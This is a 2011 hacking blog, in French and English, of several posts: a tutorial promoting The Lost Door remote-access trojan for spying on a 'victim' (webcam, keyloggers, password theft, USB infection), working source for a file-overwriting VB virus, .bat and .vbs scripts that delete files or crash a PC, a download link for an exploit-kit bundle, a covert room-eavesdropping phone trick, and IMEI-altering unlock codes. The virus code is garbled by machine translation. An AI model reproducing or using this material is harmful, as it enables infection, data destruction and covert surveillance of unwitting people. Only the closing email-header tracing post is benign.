Overblog
Suivre ce blog Administration + Créer mon blog
2 août 2011 2 02 /08 /août /2011 15:44

 

Lundi 23 août 2010

images.jpegAprés Bifrost j'ai choisi aujourd'hui de vous présenter The Lost Door 4.

Infilter un pc à distance est devenu un jeu d'enfant, plus encore the lost door propose des fonctions très puissantes...

 

 

 

 

 

 

 

 

 

Tout d'abord je tien à vous mettre en garde, en utilisant ce logiciel vous êtes le seul responsable des dégâts que vous occasionnerait, cette article est dispensé qu'a titre indicatif et dans le seul but de vulgariser.

 

de quoi avons nous besoins pour ce tuto ?

-------------------------------------------------------------------------------------------------------------------------------------------------------------

- d'un bon antivirus, je recommande de télécharger la dernière version de "Kaspersky", et oui c'est le meilleur selon moi bien sur.

- de the lost door.

- de patience, et de ne pas flipper.

------------------------------------------------------------------------------------------------------------------------------------------------------------

 

1- Pour commencer il faut créer un serveur c'est le même principe que bifrost, alors pour m'économiser je vous invite à lire le tuto sur bifrost.lost3-236x300

2- quelles sont les options que propose the lost door ?

the lost door propose des options franchement très interessantes, sans plus tarder les voici :

[+] Webcam Shot : accéder à la cam de votre victime.

[+] Imprimante : accéder à l'imprimante de votre victime.

[+] Screen Shot : faire des captures d'écrans.

[+] Server Downloader : pouvoir télécharger touts les documents présent sur le HDD de votre victime.

[+] Audio Streaming : écouter ce qu'écoute votre victime (music, films....)

[+] MSN controler : contrôler msn et récupérer touts les mots de passes

lost8

[+] Remote Shell
[+] Chat avec le serveur
[+] Envoyer de faux messages
[+] Gestionnaire de fichiers
[+] Trouver des fichiers
[+] Changer la résolution de l’écran à distance
[+] Informations sur l’ordinateur distant
[+] Gestionnaire de presse-papiers
[+] IE options
[+] Process Running
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote viewer Nat
[+] Rmote Resotr Manager

[+] Ajout de quelques Graphics
[+] Some minor bugs fixés
[+] Certains formulaires ont été modifiés
[+] News du navigateur a été ajoutée
[+] Invisible dans la recherche de fichiers
[+] Server Taille (120kb)

 

La cerise sur le gâteau, pourvoir communiquer avec votre victime en live, ouvrir/fermer le lecteur cd/dvd de votre victime et accéder au gestionnaire des taches, infecter les clé usb de votre victime...

lost2-236x300

 

 amusez vous bien !

Partager cet article
Repost0
2 août 2011 2 02 /08 /août /2011 15:39

imagesLes virus informatiques sont sous de nombreuses formes avec de nombreuses fonctions différentes. Certains sont plutôt simplistes et peuvent être détectés par l'utilisateur moyen tandis que d'autres sont complexes et passent inaperçus pendant un certain temps. Les virus les plus courants relevant de la classification des infecteurs de fichiers, qui fonctionnent en infectant des fichiers exécutables. Ils y parviennent en insérant leur code malveillant dans une zone du fichier d'origine, lui permettant d'être exécutée chaque fois que le fichier est accessible Certains d'entre eux sont capables de complètement écraser un fichier, ce qui rend tout un programme inutile.

 

C’est le cas de ce type de virus que nous allons voir aujourd’hui. Les virus Overwritters.

Je sais que les virus overwritters , n'ont malheureusement plus aucune chance de se propager et ils ne sont pas "intelligent". Malgré tout cela overwritters peut vous aider à comprendre les bases du VRAI virus. Je vais vous donner le code d'abord et ensuite on va le passer en revue.

 -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-= 

 

 Option Explicit Option Explicit

 Dim myarray() As Byte myarray Dim () As Byte

 Dim victim As String victime Dim As String

 Const mysize As Integer = 11776 mysize Const As Integer = 11776

 

 Private Sub Form_Load() Private Sub Form_Load ()

 On Error Resume Next On Error Resume Next

 Dim Free Dim gratuit

 Free = FreeFile Free = FreeFile

 

 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free

 ReDim myarray(mysize) ReDim MonTableau (mysize)

 Get #1, 1, myarray Obtenez myarray # 1, 1,

 Close #Free Close # Free

 

 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")

 While victim <> "" Bien que victime <> ""

 

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free

 Put #1, , myarray Put # 1,, myarray

 Put #1, , mysize Put # 1,, mysize

 Close #Free Close # Free

 

 victim = Dir() victime = Dir ()

 

 Wend Wend

 

 End End

 End Sub End Sub

  -=-=-=-=-=-=-=-=-=- Couper ici-=-=-=-=-=-=-=-=- =-=-= 

 

Décodons tout cela : (miam ! J)

 Option Explicit Option Explicit

 Dim myarray() As Byte myarray Dim () As Byte

 Dim victim As String victime Dim As String

 Const mysize As Integer = 11776 mysize Const As Integer = 11776

Ici, nous définissons les variables que nous allons utiliser, le "myarray ()" variable qui contient le code binaire du virus, "victime" est la variable qui contient le nom du fichier de la victime et le "mysize" variable contient la taille du virus.

 Private Sub Form_Load() Private Sub Form_Load ()

 On Error Resume Next On Error Resume Next

Nous ouvrons le sous dossier que nous allons utiliser (Form_Load), et nous avons mis notre erreur poignée c'est-à-dire qu’en cas d’erreur le programme s’arrêtera là.

 Dim Free Dim gratuit

 Free = FreeFile Free = FreeFile

C'est une bonne idée de prendre exemple sur le virus y2k. Cela vous débarrasse de la lecture / écriture des erreurs, car il est open source.

 Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free Open App.Path & "\" & & App.EXEName ". Exe" pour l'accès binaire Lire Comme # Free

 ReDim myarray(mysize) ReDim MonTableau (mysize)

 Get #1, 1, myarray Obtenez myarray # 1, 1,

 Close #Free Close # Free

Maintenant, nous allons sortir le code binaire de nos virus et nous allons le stocker dans la variable "myarray".

 victim = Dir(App.Path & "\" & "*.EXE") victime = Dir (App.Path & "\" & "*. exe")

 While victim <> "" Bien que victime <> ""

 

 Open App.Path & "\" & victim For Binary Access Write As #Free Open App.Path & "\" & victime pour l'accès binaire Ecrivez comme # Free

 Put #1, , myarray Put # 1,, myarray

 Put #1, , mysize Put # 1,, mysize

 Close #Free Close # Free

Ici, nous définissons la variable « victime » et nous avons mis notre code binaire dans le programme de la victime.

 victim = Dir() victime = Dir ()

 

 Wend Wend

Puis nous avons mis la victime à zéro, et nous répétons l'ensemble du processus d'infecter tous les fichiers. Exe dans le répertoire courant.

 End End

 End Sub End Sub

Et enfin, nous fermons le programme et les sous dossiers.

Partager cet article
Repost0
2 août 2011 2 02 /08 /août /2011 15:38

 

images.jpg

Bonjour à tous.

Aujourd’hui j’ai choisi de parler à propos des virus, on entend beaucoup parler, on a tous été infecter un jour ou l’autre par ces programmes. Parce que avant tous un virus est un programme.

Nous allons donc voir comment ça fonctionne mais aussi comment en créer ; bien sur !

Dans cette première partie, nous allons commencer avec des virus plutôt simple vous allez le voir :

Les Virus VB (Visual Basic):

Ce type de virus sont les plus anciens et ont été parmi les premiers à être apparus.

 

 

Créer un petit virus pas très méchant...

Avant toute chose je tiens a vous avertir que cette article n'est là que dans un but pédagogique, et vous n'étes nullement incités à reprtoduire ceci sur votre pc. Vous etes donc résponsable de vos actes et ni moi ni mon hébérgeur ne seons tenu pour responsable.

Nous allons apprendre à créer un petit virus en *bat. :

C’est partit :

Pour commencer, ouvrez votre editeur de texte prèfèré (ex : bloc-note).Ensuite, tapes sans sauter de ligne :


del C :windows*.bmp cls



Après, enrigistrer le code avec l’extension *.bat

Attention
 : N’ouvrez en aucun cas le fichier sur votre ordinateur, le virus s’exécutera !


 Comment ça marche, explications:

del C:windows*.bmp

del : sert à supprimer
C:windows : situe le dossier où la commande doit avoir lieu
* : suivit d'une extension désigne tous les dossiers portant cette extension dans l'exemple l'extension est *.bmp .Donc ce mini virus supprimera tous les fichiers portant l'extension *.bmp (en locurrence des images) se trouvant dans windows.

 

Ce virus pourrait être plus dangereux si vous changiez l’extension en une autre plus importante, mais la, je laisse libre choix à votre imagination !^^

 


Créer un virus plus méchant…
 


vous rêvez de savoir planter des pc très facilement ?^^

C’est partit :

Commencez, par ouvrir votre editeur de text.
Ensuite, tapes le code suivant : 


Set variable = CreateObject("WScript.Shell")
Do
variable.run "notepad",false
Loop



Après, enregistrez le avec le nom que vous voulez, avec l’extension .vbs


Petite précision :

Ici, le bloc-note (celui de windows) représente l'application désirée, vous pouvez la remplacer par une application plus lourde (pour des résultats plus rapides et meilleurs).
false : signifie que les fenêtres ne doivent pas être initialisées, seulement les processus pour que la victime ne se rende pas compte.
Loop : signifie que ça doit se faire en boucle : ça doit lancer le bloc-note, recommencé et ainsi de suite.

 

Ces virus ont été créé en Visual Basic, si vous voulez aller plus loin dans la création de virus apprenez le Visual Basic (qui est un langage de programmation plutôt simple)

Dans la deuxième partie du cours nous verrons des échantillons de vrais virus bien méchant !

Si vous voulez un bon tuto : "Apprendre le Visual basic simplement" laissez des coms.

Partager cet article
Repost0
22 juillet 2011 5 22 /07 /juillet /2011 00:14

 

THE TRICKS:

Free international calls !

With tuitalk you can make free calls from your iPhone or iPod touch, really free. And to prove it, we never ask for your credit card information, because we are not going to charge you, not today and not tomorrow. So, keep your credit card information safe and save your money by making.

Advantages to use Tuitalk on iphone ?
- Make free phone calls on your iPhone and iPod touch!
- Turn your iPone3G into a free phone.
- Free phone calls to over 40 countries from anywhere in the world (with Internet access).
- Free mobile-to-mobile & mobile-to-landline phone calls, to over 40 Tuitalk Countries.
- Just watch a short video ad and make free international & domestic phone calls.
- All calls are sponsored by advertisers.

. Dimming the screen:
the screen brightens uses more battery power. Change this under Settings -> Brightness

. Turning off 3G :
If you are in a location where 3G does not work, then you will not need to activate this service on your iphone and you do not get any benefit from the phone battery-hungry 3G radio. By turning it off, you double the length of your iPhone 3G battery, 5 hours of talk time to 10.
For turning off 3G : In home screen, tap Settings / General / Network /
Enable 3G Off

. Turning off Wi-Fi :
As with 3G , If you are in a location where Wi-Fi does not work, then you will not need to activate this service on your iphone and you do not get any benefit from the phone battery.
to do that : In home screen, tap Settings/Wi-Fi/On/Off.

. Turning off Bluetooth:

If you’re not using a Bluetooth headset, then for heaven’s sake shut down that Bluetooth radio. In Settings, tap General, and turn off Bluetooth.

. Turning off push e-mail:

If your email, calendar, and address book are kept constantly synced with your Macs or PCs, then you’ve probably gotten yourself involved with Yahoo Mail, Microsoft Exchange , or MobileMe . It’s pretty amazing to know that your iPhone is constantly kept current with the mothership—but all that continual sniffing of the airwaves, looking for updates, costs you battery power. If you can do without the immediacy, visit Settings / Fetch New Data ; consider turning off Push and letting your iPhone check for new information, say, every 15, 30, or 60 minutes.

. Turning off GPS:

If you are not be needing the iPhone to track your location, save it the power required to operate the GPS chip and the other location circuits.
In Settings, tap General, and turn off Location Services.

All codes Secrets for Apple iPhone

With these codes you can access to any function call-status (disabled/enabled), how many minutes you have left on your pre-paid account (as well as your other quota post-paid minutes)..
*#06# display IMEI number.*3001#12345#* and tap Call. Enter field mode, (iPhone network and cellular information)* 777 # and tap Call. Show the balance amount if prepaid .. * 225 # and tap Call. Post-paid account balance.
* 646 # and tap Call. Call minute balance postpaid phone.
* # 21 # and tap Call. Call feature setup (enabled / disabled) for voice, data, fax, SMS, sync, async, access package, call forwarding.
* # 30# and touch call. Caller-ID display check (on / off)
* # 76# and touch call. Connected call screen check (on / off)
* # 43# and touch call. Determine if call waiting is activated.
* # 61 # and tap Call. Call with a number of services (no-answer)
* # 62 # and tap Call. Call Forwarding number without service (non-ring)
* # 67 # and tap Call. Call when the number occupied
* # 33 and # touch call. Check outgoing call services for call-barring (enabled / disabed)

BLACK BERRY

How To Enter the Unlock Codes on a BlackBerry Cell Phone

All models of BlackBerry (do not work with T-Mobile)

1 - Go to the menu, then Settings Menu -> Select Advanced options => and then Sim card.
2 - While holding down the SHIFT key, type MEPD or (MEPPD combines for Vodafone)
3 - You should now see the five categories listed lock.
4 - While holding down the SHIFT key, type MEP2 or (MEPP2 handsets for Vodafone)
5 - Release the Shift key.
6 - You are now invited to enter the Network MEP code (it will also be the number of attempts left)
7 - Enter the code
8 - Enter Return / Enter
9 - The device must be unlocked
Model : T-mobile BlackBerry Models

1 - In Home screen, click the Tools icon. The Options screen appears.
2 - Select Settings icon.
3 - Scroll to SIM Card and select it. You should see the phone number and and identification number of the SIM card.
4 - Type ‘mepd’ to display the first five levels of SIM locking.
T-Mobile uses the network to lock network should display Active. All other states must be disabled
note: For the Blackberry 7100t you press "P" twice when entering the mepd 'and' mep2 "for steps 4 and 5..
5 - Type ‘mep2′ to display the dialog box asking for the unlock code (Press the Alt + 2 key to get the number 2)
6 - Enter the unlock code network
7 - Press ENTER and reboot handheld.

All codes Secrets Information BlackBerry:


Decibel meter.
Displays your signal strength in decibels, instead of bars.
Hold "Alt" and press "N", "M", "L", "L" (repeat to reverse the effect).

Address Book file verification.
Checks the data in your Address Book for inconsistencies.
In the Address Book, hold "Alt" and press "V", "A", "L", "D".

Address Book data structure rebuild.
Forces a data structure re-build in the Address Book...
In the Address Book, hold "Alt" and press "R", "B", "L", "D".

View source code.
Displays the source code of a Web page.
In the Browser, hold "Alt" and press "R", "B", "V", "S".

Help Me! menu.
Provides crucial technical information about your device, for when seeking technical support or help in forums...
Hold "Alt" and (left) "shift", then press "H".

IMEI display.
Displays your device's international mobile equipment identity (IMEI - your serial number) on-screen... Also works from all other GSM handsets.
Type "*", "#", "0", "6", "#" on the Home screen.

"Soft" reset.
Performs a "soft" reset of your device; the equivalent of doing a "battery pull" (ie. Removing the battery for a few seconds).
Press-and-hold "Alt", then press-and-hold (left) "shift", then press-and-hold "Del".

Event Log.
Displays event logs of all the system-level events that occur on your device...
Hold "Alt" and press "L", "G", "L", "G".

All of these secrets have been tested on the BlackBerry 8800 and BlackBerry Curve 8300; .

In some cases, you will need to be on the Home screen when you enter these codes...
Key shortcuts:
A or C = phonebook
S = search
F = phone profiles
W or B = browser
H = help
K = locks the keys
L = calendar
V = messages
M = messages folder
R = alarm
T = tasks
U = calculator
I = applications
O = options
P = phone

Some new additions thanks to the contributions in this thread:

T - Top of page (in browser)
B - Bottom of page (in browser)
Space - Page down (in browser)
ALT + Right Shift + Del = hard reset
D - Memo pad
U - Switch between hide/unhide in title bar (in browser)
ALT + NMLL = numbers instead of bars for signal strength

SONY ERICSSON

Sony Ericsson Codes Secrets Tips and Tricks 

Sony Ericsson Secret Codes 2
SonyEricssonSecretCodes.info

Reset English Menu: *#0000#

Programming Menu (Short): 987 + >

Programming Menu (Long): 923885 + >

Field Test: 904090 + > (to exit 904090 + >)

Phone Test: 904059 + > (to exit 3 + <)

Analog Mode: 904095 + menu DM mode 904959 + menu

SonyEricssonSecretCodes.info
Sony Ericsson secret codes
Secret codes
SonyEricssonSecretCodes.info

Secret menu / Software version: >*<<*<*

Reset Theme <0000>

Serial Number / IMEI: *#06#

Network Information <**<

Lock status: <- * * <-

Shortcut to last dialed numbers: 0#

Default Language: < 0 0 0 0 >

Shortcut to sim numbers: On main menu type a number and press #

Programming Checks: >*<<*<*> or >*<<*<*>

Phone Test: 904059 + > (to exit 3 + <)

Opening phone without a SIM card: **04*0000*0000*0000# followed by on 'Wrong Pin' number

Here are some of hidden smilies for messages. You wont find them in "Add symbol"

1. :-]

2. :-[

3. :-*

4. [:]

5. :<^

6. ://

7. :&

8. :'(

LG

All codes Secrets for LG Cell phone

These secret codes will work on most of the LG mobile Phone handsets

LG all models test mode: Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :

- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select 'SW Ver.info'
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select 'Factory Reset'
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*#

SAMSUNG

For all:
*#06# Show IMEI
*#9999# Show mobile Software Version
*#0837# Show mobile Software Version (instructions)
*#0001# Show Serial Parameters
*#9125# Activates the smiley when charging
*#0523# LCD Contrast
samsung mobiles

*#9998*228# Battery status (capacity, voltage, temperature)
*#9998*246# Program status
*#9998*289# Change Alarm Buzzer Frequency
*#9998*324# Debug Screens
*#9998*364# Watchdog
*#9998*377# EEPROM Error Stack - Use side keys to select values
*#9998*427# Trace Watchdog
*#9998*523# Change LCD contrast
*#9998*544# Jig detect
*#9998*636# Memory status
*#9998*746# SIM File Size
*#9998*778# SIM Service Table
*#9998*785# RTK (Run Time Kernel) errors - if ok then phn is reset, info is put in memory error

*#9998*786# Run, Last UP, Last DOWN
*#9998*837# Mobile Software Version
*#9998*842# Test Vibrator - Flash the screenlight during 10 sec and vibration activated

*#9998*862# Vocoder Reg - Normal, Earphone or Carkit
*#9998*872# Diag
*#9998*947# Reset On Fatal Error
*#9998*999# Last/Chk

*#9998*9266# Yann debug screen (Debug Screens?)
*#9998*9999# Software version

*0001*s*f*t# Changes serial parameters (s=?, f=0.1, t=0.1)
*0002*?# unknown Samsung's comand
*0003*?# unknown Samsung's comand

For Mobile phones SGH (R210, T100, A300...)
if Samsung code is in format *#9998*xxx#
try write in this *#0xxx#

SGH-600
SGH-2100

*2767*3855# Full EEPROM Reset (THIS CODE REMMOVES SP-LOCK! but also changes IMEI to 447967-89-400044-0

*2767*2878# Custom EEPROM Reset

Samsung mobile phone codes: Samsung E700

*2767*688# remove USER CODE and SIMLOCK

Samsung mobile phone codes: Samsung V200

Unlocking:
Power on the mobile phone without SIM card and type these codes:

*2767*63342# and press green button
*2767*3855# and press green button
*2767*2878# and press green button
*2767*927# and press green button
*2767*7822573738# press button

Phone will be unlocked, but all trims are reseted !!!
Mobile phone must be fully charged

Samsung mobile phone codes: Samsung S500
Unlocking
*2767*MVT# (*2767*688#) E2P MVT Reset
*#SIMLOCK# (*#7465625#)

On the main screen type *#06#

Information you get from the IMEI (International Mobile Equipment Identity)
XX XX XX X
TAC FAC SNR SP

TAC = Type approval code of your samsung Mobile
FAC = Final assembly code of your cellphone
SNR = Serial number of your samsung Phone
SP = Spare

If you have downloaded corrupted or incompatible Java midlets or other media,
which are causing problems with the phone, try this
*2767*JAVA# Java Reset and (Deletes all Java Midlets)
*2767*MEDIA# Reset Media (Deletes All Sounds and Pics)
*2767*WAP# Wap Reset
*2767*CUST# Reset Custom EEPR0M
*2767*FULL# Reset Full EEPR0M (Caution)
For example : *2767*JAVA# would be keyed in as *2767*5282#
Note : Not all codes will work with SGH-C100.

The master reset code is:
#*7728#
This will not delete anything from your
mobile phone, but set each and eveything to its
default/standard setting as it was on the time of purchase.

To unlock your phone put a sim from another company,
now type *#9998*3323# it will reset your phone. Push exit and then push 7,
it will reset again. Put your other sim in and it will say sim lock,
type in 00 then it should be unlocked. Type in *0141# then
the green call batton and it's unlocked to all networks.
This code may not work on the older phones and some of the newer phones.
If it doesn't work you will have to reset your phone without a sim in it
by typing *#2767*2878# or *#9998*3855# (not tested)

Other Samsung Codes
*#9998*4357# Help Menu
*#9998*5282# Java menu (GRPS/CSD settings for JAVA server)
*#9999#0# Monitor Mode
*#9999# or *#9998*9999# Software Version
*#8888# or *#9998*8888# Hardware Version
*#9998*746# or *#9998*0746# or *#0746# Sim Infos
*#9998*523# or *#9998*0523# or *#0523# Display Contrast
*#9998*842# or *#9998*0842# or *#0842# Vibration On (until you push OK)
*#9998*289# or *#9998*0289# or *#0289# Buzzer On (until you push OK)
*#9998*288# or *#9998*0288# or *#0288# Battery & Field Infos
*#9998*377# or *#9998*0377# Error log
*#9998*778# or *#9998*0778# or *#0778# Sim Service table
*#9998*782# show date and alarm clock
*#8999*638# show network information
*#9998*5646# change operator logo at startup
*#9998*76# production number
*#9998*968# view melody for alarm
*#9998*585# Non-Volatile Memory (NVM)
*#3243948# Digital Audio Interference Off
*#32436837# Digital Audio Interference On

THE PRANK : 

Change closed caller group (settings >security settings>user groups) to 00 and your phone will sound the message tone when you are near a radar speed trap.
Setting it to 500 will cause your phone 2 set off security alarms at shop exits.
Try this secret trick if you can handle the unexpected.
Note: This secret trick wont work with all phones Models.

THE TRICK :

Now you can spy on anyone using your cellphone. Just do the following.

1. Activate the "Automatic Answer" in the headset profile of your cellphone and set the ringing volume to "Mute"
2. Short-circuit the left middle and right pins on the bottom of the mobile phone with all connections touching each other this will activate profile "Headset".
If you cant do this just keep your earphone connected to mobile.
3. Now place it under a table in a room and call it. Now you can use your phone for checking out what people are talking about in a room. Just call on your phone.
4. The phone receives the call without ringing and you can listen to what people are saying.

Special thanks to: http://www.messiphone.com/mobile-secret/iphone.html
and to: http://www.hiddentricks.com/mobile/samsung-secrets.html

www.hackforums.net
Partager cet article
Repost0
22 juillet 2011 5 22 /07 /juillet /2011 00:10

 










































List of Hacking Exploit Kits :


  1. Unknow
  2. Tor
  3. Target-Exploit
  4. Smart pack
  5. RDS
  6. My poly sploit
  7. multisploit
  8. mypack-009
  9. mypack-091
  10. mypack-086
  11. mypack-081
  12. Mpack
  13. Infector
  14. Ice-pack-1
  15. Ice-pack-2
  16. Ice-pack-3
  17. G-pack
  18. Fire pack -1
  19. Fire Pack -2
  20. Fiesta -1
  21. Fiesta -2
  22. Cry 217
  23. Armitage
  24. Adpack -1
  25. Adpack -2
  26. 0x88
  27. Download :http://www.filesonic.in/file/1333076431
    (Note : Try any other link except Rapidshare,sometimes it may not work)
    Rar password : thn

 

Partager cet article
Repost0
22 juillet 2011 5 22 /07 /juillet /2011 00:03

I'm a big fan of phreaking and I thought I'd contribute to this section since it might in handy to many in here.

I have setup an extra phone number on my cellphone, 2 extra phone numbers on my computer, plus my regular phone number.

There is also the option of spoofing as I mentioned on my tutorial below to have an unlimited amount of phone numbers.

I wrote a tutorial on:

How to hack with a cellphone Part 1/2 [Extremely detailed]
How to hack with a cellphone Part 2/2 [Extremely detailed]

I setup an incoming and outgoing feature via my computer in the cases where I was out of town and I couldn't get reception on my cellphone, therefore I would use the internet as a a Voice over Internet Protocol (Voice over IP, VoIP) instead.

Let's get to it.

What I will cove

1) What you need


-Gmail account with Google voice
-Sipgate
-Patience and common sense.

2) Google voice

Obviously since it's Google voice, you're going to need a gmail account.

Go to http://gmail.com

Make an account, and you're going to need to verify it via a U.S based cellphone.

After you have gmail account, go here.

http://google.com/voice

We're going to be using various websites to get everything in order for you.

You might need an actual U.S cellphone. If you don't live in the U.S, try to find someone who lives in the U.S to receive a text message that Google voice will send to you.

Try to find someone who is willing to receive a SMS (Text message for you) in the Service offerings section in HF 
HERE people usually do it for a $1-5.

If you don't want to take this road, I suggest that you read this below.

Bypass Google verification
Credits: Mr.Steven

If you don't want to go either both trouble, you can watch this video if you are not a U.S inhabitant to learn how to bypass the Google voice verification as well or even if you do in fact live in the U.S but not want to verify it with your cellphone, you can watch the video as well to bypass it.





Basically, you're going to have to verify your Google voice phone number via a text message that Google will send to a U.S based cellphone or if you watch the video, through that particular method.

Alright, so by now you should have your Google voice account ready for the next step.

2) Sipgate

Sipgate is an VoIP (Voice over IP telelphone), it allows you to have unlimited incoming calls but charges for outgoing calls and that's where Google voice comes in to bypass this problem.

In theory, if you do this you can have access to have unlimited calls outgoing/incoming as well as SMS (text messages).

And if used wisely, the receiver can setup the same process and you both can call each other via Google voice through the computer or through a smart phone if it has the ability to use Google voice (My Nokia N900 cellphone has it), so theoretically speaking you can use this as exploitable form of making international calls without paying a cent.

The receiver and the caller would need to setup everything explained on this tutorial. Google voice only works if you have a U.S based phone number, so even if you live in a different country it can still be bypassed if the receiver and the caller setup a bogus U.S phone number only to receive and make phone calls. After all, it will not detect anything since you are on the internet and not using an actual U.S based network.

For example:
So, you can live in Russia and have a U.S based cellphone number and you can call a friend in Australia whom has also setup a U.S based cellphone. With the use of a smart phone that has internet service on it using Google voice apps, you can use your gmail account to login on the app and make calls to any part of the world as long as both parties have followed the process on this tutorial.

And of course, if you live in the U.S you can call any U.S based cellphone for free.

Also, theoretically speaking if you only paid for internet service on your cellphone you can have this service using Google voice to make phone calls and SMS (text messages) unlimited and save a lot of money monthly.

Anyway, what I'm explaining here is to use on a computer but like I said if you have a smart phone you can abuse this system and save money.

To setup Sipgate:





The video explains lots of time explaining the setup process.

So, by now you should have the ability to make outgoing and incoming phone calls using Google voice as the outgoing source, sipgate as the incoming source, and manipulating sipgate to convert into going without using sipgate credits.

3) Testing

I can't possibly show you how I tested it since I can't call any of you reading this tutorial and I don't want to expose phone numbers of anyone I personally know. Tongue

All I can say is that it works for U.S unlimited calls & SMS for FREE.
And if used correctly, you can manipulate the services to have international calls for FREE as well.


If you plan to abuse it for international calls.

This will be a bit disappointing for those who don't live in the U.S, but there are a few things that you might want to consider.

If you plan to abuse it from a cellphone to a cellphone.

1. Both the receiver and caller are going to definitely need a smartphone that has Google voice as a possible installable application.

Why? Because when you make phone calls via Google voice, you need to login to the Google voice app using your gmail account, but of course if you plan to use only 1 person as the caller, only 1 of the 2 persons would need a smart phone.

-Possible smart phones you can use
1. Nokia N900 (Linux based) - Cellphone I use.
2. Any android based operating system cellphones
3. iPhones

Not only will you need a smart phone, but you will also need internet access when you are making an outgoing call (the caller). The receiver of the phone call does not needs internet access to receive the phone call.

Computer to cellphone

Obviously, you'd still need a smart cellphone to receive the calls since you'll have to login on the Google voice application (the receiver only).

The computer would act as the caller, so you don't need a cellphone, instead just have Google voice and sipgate setup to dial as outgoing to the setup U.S based cellphone on the cellphone (receiver).

Note that the receiver doesn't need to be online to receive phone calls. It is recommended that the receiver also has a smart phone ONLY if they want to in essence act as a caller for outgoing, and that is when they would need internet access with Google voice application on their cellphone, or vice versa Caller->Receiver or Receiver->Caller.

If everything goes well and if you read everything correctly, you will save your self a lot of money and you must've learned some great new knowledge.


If you don't live in the USA, download HotSpotShield
http://hotspotshield.com/
Install it and run it. After you do that, you will have a USA based IP and Google voice will work.
Partager cet article
Repost0
22 juillet 2011 5 22 /07 /juillet /2011 00:02


Backtracking EMAIL Messages 

Tracking email back to its source: Twisted Evil
cause i hate spammers... Evil or Very Mad

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.


Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Maricela Paulson" <s359dyxtt@yahoo.com>

Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

